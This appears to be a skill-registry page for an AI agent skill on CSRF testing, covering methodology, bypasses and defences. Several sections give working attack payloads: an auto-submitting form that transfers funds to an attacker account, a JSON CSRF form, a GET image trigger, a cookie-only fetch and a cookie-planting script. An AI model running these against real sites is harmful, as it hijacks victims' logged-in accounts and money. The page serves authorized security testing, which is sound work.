csrf-testing
Total installs: 11
Weekly installs: 4
Site rank: #27767
Install command
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill csrf-testing
Agent install distribution
codex: 3
opencode: 2
amp: 1
kimi-cli: 1
claude-code: 1
Skill documentation
CSRF (Cross-Site Request Forgery) Testing
Overview
CSRF (Cross-Site Request Forgery) is an attack that abuses a user's logged-in state to perform actions the user did not intend. The browser attaches the victim's credentials to a request that an attacker-controlled page triggered, so the server cannot tell the forged request from a legitimate one. This skill covers detecting, exploiting and defending against CSRF.
How the vulnerability works
- The attacker lures the logged-in user to a page they control
- That page automatically issues a request to the target site (a form submit, image load or navigation)
- The browser attaches the user's credentials to it (session cookie, or HTTP Basic/NTLM auth)
- The target site accepts the request as a legitimate action by the user, because nothing in it proves the user meant to send it
Testing methodology
1. Identify state-changing operations
- Password change
- Email address change
- Funds transfer
- Permission or role changes
- Data deletion
- Status updates
Read-only requests are not CSRF targets; focus on anything that changes server state while authenticated.
2. Check for a CSRF token
Look at whether each sensitive form or request carries an anti-CSRF token:
<!-- Token present -->
<form method="POST" action="/change-password">
<input type="hidden" name="csrf_token" value="abc123">
<input type="password" name="new_password">
</form>
<!-- No token: CSRF candidate -->
<form method="POST" action="/change-email">
<input type="email" name="new_email">
</form>
A token may also travel in a request header (for example X-CSRF-Token set by JavaScript) rather than in a hidden field, so check XHR/fetch requests in the proxy history as well as HTML forms. A request that is still accepted after the token is removed or altered is vulnerable even if the form shows one.
3. Verify the token is actually effective
Test whether the token is predictable or not tied to the request:
- Is it derived from a timestamp?
- Is it derived from the user ID (or another value an attacker can obtain)?
- Is it accepted more than once (replay)?
- Is the same token shared across requests, sessions or users?
- Is the request accepted when the token parameter is removed, blank, or swapped for another user's token?
4. Check Referer / Origin validation
Test whether a Referer-based check can be bypassed:
// Normal request
Referer: https://target.com/change-password
// Bypass attempts
Referer: https://target.com.evil.com
Referer: https://evil.com/?target.com
Referer: (empty; an attacker page can suppress it with <meta name="referrer" content="no-referrer">)
A check that only looks for the string "target.com" somewhere in the header passes the first two; a check that allows requests with no Referer passes the third. The header must be parsed and its origin compared exactly, and the Origin header (sent by browsers on cross-origin form POSTs) should be checked in preference.
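To see why those three bypasses work, the following added example (not from the original skill) puts a substring-based Referer check of the flawed kind beside one that compares the parsed origin, and runs both over the probe values above plus a few more. The target origin https://target.com and the probe list are assumptions for illustration.

```javascript
// Added example, not part of the original skill: a lenient substring Referer
// check of the kind the bypass values above defeat, beside a strict check that
// compares the parsed origin. Run against constructed probe headers.
const TARGET_ORIGIN = 'https://target.com';  // assumed application origin

// Flawed: "does the header mention our host?" and "no header, no check".
function weakRefererCheck(referer) {
  if (!referer) return true;                  // lenient on a missing header
  return referer.includes('target.com');
}

// Correct: parse the header and compare scheme + host + port exactly.
// Origin is preferred when present (browsers send it on cross-origin POSTs);
// Referer is the fallback. Missing both is rejected, since an attacker page
// can suppress Referer with a referrer policy.
function strictOriginCheck({ origin, referer }) {
  const candidate = origin || referer;
  if (!candidate) return false;
  let url;
  try { url = new URL(candidate); } catch { return false; }   // "null", "", garbage
  return url.origin === TARGET_ORIGIN;
}

// Constructed probes: the legitimate value, the page's three bypasses, and a
// few other shapes seen in practice.
const PROBES = [
  { referer: 'https://target.com/change-password' },  // legitimate
  { referer: 'https://target.com.evil.com' },         // host suffix trick
  { referer: 'https://evil.com/?target.com' },        // host in query string
  { referer: 'https://evil.com/target.com' },         // host in path
  { referer: 'http://target.com/' },                  // scheme downgrade
  { referer: '' },                                    // suppressed Referer
  { origin: 'null' },                                 // sandboxed iframe / data: URL
];

// Evaluate every probe under both checks.
function compare(probes) {
  return probes.map(p => ({ ...p, weak: weakRefererCheck(p.referer), strict: strictOriginCheck(p) }));
}

console.table(compare(PROBES));
```

Only the first probe passes the strict check; every probe passes the weak one. The strict check also accepts https://target.com:443/x, because URL parsing normalizes the default port, which is the kind of case a hand-written string comparison gets wrong.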
Exploitation techniques
Basic CSRF attack
Auto-submitting HTML form hosted on the attacker's page:
<form action="https://target.com/api/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
The submission is a top-level navigation, so the victim sees the response page; point the form at a hidden iframe with a target attribute when the attack should be silent.
JSON CSRF
Getting past a naive Content-Type check:
<!-- Submit a JSON body from a plain HTML form -->
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
<input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
</form>
<script>document.forms[0].submit();</script>
With enctype="text/plain" the browser sends name=value, so the body becomes {"email":"attacker@evil.com","ignore":"="}: valid JSON with the stray "=" absorbed into a dummy field. The Content-Type is text/plain, not application/json, so this only works against endpoints that parse JSON regardless of the declared type. A server that rejects anything but application/json is not affected, because a form cannot send that type and fetch/XHR cannot send it cross-origin without a CORS preflight.
GET-based CSRF
State changes reachable over GET can be triggered by any resource load:
<img src="https://target.com/api/delete?id=123">
Note that an <img> is a subresource: with a SameSite=Lax session cookie it is fetched without the cookie. A top-level navigation (a link the user clicks, or window.location = ... from the attacker's page) does carry Lax cookies, so use that when testing against Lax.
Bypass techniques
Token bypass
When the token lives in a cookie:
// If the token is both in a cookie and in the form, check whether the server
// actually requires the form copy: send the request without csrf_token so only
// the cookie is present. A server that skips validation when the parameter is
// absent will accept it.
fetch('https://target.com/api/action', {
method: 'POST',
credentials: 'include',
// URLSearchParams gives application/x-www-form-urlencoded, which needs no
// CORS preflight, so the request is sent even though the response cannot be read
body: new URLSearchParams({ action: 'delete', id: '123' })
// no csrf_token parameter: relies on the cookie alone
});
SameSite cookie bypass
Using a subdomain or the Lax exemptions:
- SameSite restricts cookies by site, not origin, so a page on any subdomain of target.com (reached via XSS on it or a subdomain takeover) is same-site and can forge requests unhindered
- With SameSite=Lax, cookies are still sent on top-level GET navigations, so a GET endpoint that changes state remains exploitable via a link or window.location
- Chromium's "Lax by default" for cookies that set no SameSite attribute also sends them on top-level POSTs for the first two minutes after the cookie was set
- With SameSite=None the attribute offers no CSRF protection at all
Double-submit cookie
Bypassing the token check:
<!-- Only works when the check is merely "cookie value == form value" and the
     attacker can set a cookie for the site: a page on a sibling subdomain can set
     one for .target.com. From an unrelated origin, document.cookie never exposes
     target.com's cookies, so the script below has to run same-site. -->
<form action="https://target.com/api/action" method="POST">
<input type="hidden" name="csrf_token" value="">
<script>
// Read the token from a cookie this origin can see (or plant it first with
// document.cookie = 'csrf_token=attacker; domain=.target.com; path=/')
document.cookie.split(';').forEach(c => {
if(c.trim().startsWith('csrf_token=')) {
document.querySelector('input[name="csrf_token"]').value =
c.split('=')[1];
}
});
</script>
</form>
Tooling
Burp Suite
Use the built-in CSRF PoC generator:
- Intercept the target request (or pick it from the proxy history)
- Right-click → Engagement tools → Generate CSRF PoC
- Host the generated HTML on another origin and confirm the request arrives with the victim's cookies
OWASP ZAP
# Run a ZAP quick scan; the passive "Absence of Anti-CSRF Tokens" rule flags forms without a token
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' http://target.com
Verification and reporting
Verification steps
- Confirm the operation has no effective CSRF protection (no token, or a token that is not validated, and no working Origin/Referer check)
- Build the malicious page on a separate origin and confirm the action executes for a logged-in test account
- Assess impact (data exposure, privilege escalation, financial loss, account takeover via email or password change)
- Record the full PoC, including the browser and SameSite behaviour it was verified against
Report contents
- Location of the vulnerability and the affected operations
- Attack scenario and scope of impact
- Complete reproduction steps and PoC
- Remediation advice (synchronizer token, SameSite cookies, Origin/Referer validation, etc.)
Defences
Recommended measures
- CSRF token (synchronizer token pattern)
  - Each form or state-changing request carries a unique, unpredictable token
  - The token is stored server-side in the session
  - The server rejects the request unless the submitted token matches the session's token (constant-time comparison)
- SameSite cookie
  Set-Cookie: session=abc123; SameSite=Strict; Secure
  (Lax is the usual compromise when cross-site top-level links must keep the user logged in; it still needs a token for GET endpoints that change state)
- Double-submit cookie
  - The token is present both in a cookie and in the form or a request header
  - The server verifies that the two match; bind the token to the session (for example an HMAC over the session ID) so an attacker who can set cookies for the site cannot simply choose both values
- Origin/Referer validation
  - Check that the Origin (or Referer) header is the application's own origin, comparing the parsed origin rather than a substring
  - Decide explicitly how to treat a missing header; allowing it by default is a bypass
Notes
- Test only in environments you are authorized to test
- Avoid real impact on user accounts; use dedicated test accounts and harmless target values
- Record every test step
- Account for browser differences, particularly in default SameSite handling and referrer policies